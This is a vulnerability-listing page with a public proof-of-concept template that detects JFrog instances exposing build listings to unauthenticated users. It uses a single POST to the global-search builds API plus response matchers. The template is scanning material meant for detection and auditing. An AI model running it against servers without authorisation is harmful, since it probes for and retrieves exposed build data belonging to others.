jfrog-unauth-build-exposed: JFrog Unauthentication Builds

Date: 2025-08-01 | Affected software: JFrog | PoC: public

Vulnerability description

JFrog Builds are exposed to Unauthenticated users.

PoC code [public]

id: jfrog-unauth-build-exposed

info:
  name: JFrog Unauthentication Builds
  author: dhiyaneshDK
  severity: medium
  description: JFrog Builds are exposed to Unauthenticated users.
  reference:
    - https://github.com/jaeles-project/jaeles-signatures/blob/master/common/jfrog-unauth-build-exposed.yaml
  metadata:
    max-request: 1
  tags: jfrog,vuln

http:
  - raw:
      - |
        POST /ui/api/v1/global-search/builds?jfLoader=true HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"name":"","before":"","after":"","direction":"desc","order_by":"date","num_of_rows":100}

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "last_build_number"
          - "build_name"
        condition: and
        part: body

      - type: word
        words:
          - application/json
        part: header

      - type: status
        status:
          - 200
# digest: 4a0a0047304502203cf7ecbe95acad9e74cc4d7919530881e65c49f990a98ec6cc8621104fb0a7ae022100fcf97f9e49cc7ecbd2de295b3112f332c7fe55f16f632b42fac6905a73abd241:922c64590222798bb761d5b6d8e72950
